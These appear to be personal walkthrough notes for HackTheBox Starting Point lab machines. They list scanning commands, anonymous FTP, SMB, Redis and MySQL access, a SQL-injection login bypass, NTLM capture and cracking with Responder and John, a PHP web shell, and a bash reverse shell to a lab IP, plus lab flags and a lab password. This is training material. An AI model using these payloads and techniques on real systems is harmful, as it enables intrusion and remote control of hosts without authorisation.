# Learn the basics
of Penetration Testing
HackTheBox Learn the basics

10.129.21.27
telnet 10.129.21.27
root

## Fawn
HackTheBox Fawn Walkthrough
10.129.103.163

nmap -sV 10.129.103.163
nmap -sV -Pn 10.129.103.163

ftp -v 10.129.103.163
anonymous
password
get flag.txt
exit
cat flag.txt
035db21c881520061c53e0536e44f815

# Dancing
HackTheBox Dancing Walkthrough
10.129.199.43
nmap -sV 10.129.199.43
smbclient -L 10.129.199.43
smbclient //10.129.199.43/WorkShares
get James.P\flag.txt
cat 'James.P\flag.txt'
5f61c10dffbc77a704d76016a22f1664

# Redeemer
HackTheBox Redeemer Walkthrough
10.129.3.125
nmap -p- --min-rate 5000 -sV 10.129.3.125
redis-cli
redis-cli --help
redis-cli -h 10.129.3.125
info
select
select 0
keys *
get flag
03e1d2b376c37ab3f5319922053953eb

# Appointment
HackTheBox Appointment Walkthrough
10.129.152.119
What does the acronym SQL stand for?
Structured Query Language

What is one of the most common types of SQL vulnerabilities?
SQL injection

What is the 2021 OWASP Top 10 classification for SQL injection vulnerability?
A03:2021-Injection

What does Nmap report as the service and version that are running on port 80 of the target?
nmap -sV 10.129.152.119
Apache httpd 2.4.38 ((Debian))

What is the standard port used for the HTTPS protocol?
443

What is a folder called in web application terminology?
directory

What is the HTTP response code is given for ‘Not Found’ errors?
404

dir

What single character can be used to comment out the rest of a line in MySQL?
#

sqlmap -u http://10.129.152.119/ --data="username=admin&password=pass" -a
admin'#

Congratulations!

Your flag is: e3d0796d002a446c0e622226f42e9672

# Sequel
HackTheBox Sequel Walkthrough
10.129.85.234
nmap -p 3306-3306 -sV -sC 10.129.85.234
3306
MariaDB
-u
root
mysql -u root -h 10.129.85.234
*
;
show databases;
htb
use htb;
show tables;
SELECT * from config;
7b4bec00d1a39e3dd4e021ec3d915da8

#Crocodile
HackTheBox Crocodile Walkthrough
10.129.151.7
nmap -F -sV -sC 10.129.151.7
-sC
vsftpd 3.0.3
ftp anonymous@10.129.151.7
230
anonymous
get
get allowed.userlist
get allowed.userlist.passwd

cat allowed.userlist
cat allowed.userlist.passwd
admin
Apache httpd 2.4.41

gobuster dir -u http://10.129.151.7/ -w /opt/SecLists/Discovery/Web-Content/directory-list-1.0.txt

gobuster dir -u http://10.129.151.7/ -w /opt/SecLists/Discovery/Web-Contdashboard/ent/Common-PHP-Filenames.txt -x php

gobuster dir -u http://10.129.151.7/dashboard/ -w /opt/SecLists/Discovery/Web-Contdashboard/ent/Common-PHP-Filenames.txt -x php

login.php
http://10.129.151.7/login.php
admin
rKXM59ESxesUFHAd

c7110277ac44d78b6a9fff2232434d16

# Responder
HackTheBox Responder Walkthrough
10.129.162.46
curl http://10.129.162.46
unika.htb

sudo nano /etc/hosts
nmap -F -sV -sC 10.129.162.46
php
page
../../../../../../../../windows/system32/drivers/etc/hosts
//10.10.14.6/somefile
NTLM stands for New Technology LAN Manager
responder -I tun0
ip a | grep tun0
unika.htb/index.php/page=//10.10.16.75/SharedFileHTB
John The Ripper
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
badminton
nmap -Pn -sV -sC -T4 -p 5985-5985 10.129.162.46
evil-winrm -i 10.129.162.46 -u Administrator -p badminton
5985
cd C:\Users\mike\Desktop
type flag.txt
ea81b7afddd03efaa0945333ed147fac

# Three
HackTheBox Three Walkthrough
10.129.123.168
nmap -F -sV -sC 10.129.123.168
2
thetoppers.htb
/etc/hosts
10.129.123.168 thetoppers.htb

gobuster vhost -u http://thetoppers.htb/ -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

curl thetoppers.htb
curl s3.thetoppers.htb
curl http://10.129.123.168 -H "HOST: s3.thetoppers.htb"

echo -e "# htb-starting-point-tier-1-three subdomain host ip mapping\n10.129.123.168 s3.thetoppers.htb" | sudo tee -a /etc/hosts
echo -e "10.129.123.168 thetoppers.htb" | sudo tee -a /etc/hosts
sudo nano /etc/hosts

s3.thetoppers.htb
amazon s3
awscli
aws configure
test
aws --endpoint-url http://s3.thetoppers.htb/ s3 ls
aws --endpoint-url http://s3.thetoppers.htb/ s3 ls s3://thetoppers.htb
aws s3 ls
php

aws configure

echo '<?php system($_GET["cmd"]); ?>' > test.php
cat test.php

echo 'bash -i >& /dev/tcp/10.10.16.75/4321 0>&1' > revshell.sh
cat revshell.sh

aws --endpoint-url http://s3.thetoppers.htb/ s3 cp test.php s3://thetoppers.htb/test.php

aws --endpoint-url http://s3.thetoppers.htb/ s3 cp revshell.sh s3://thetoppers.htb/revshell.sh

aws s3 ls --endpoint-url http://10.129.15.129:8 s3://s3.thetopper.htb
curl http://10.129.123.168/shellme/shellid.php?cmd=type%20../../flag.txt -H "HOST: thetoppers.htb"

a980d99281a28d638ac68b9bf9453c2b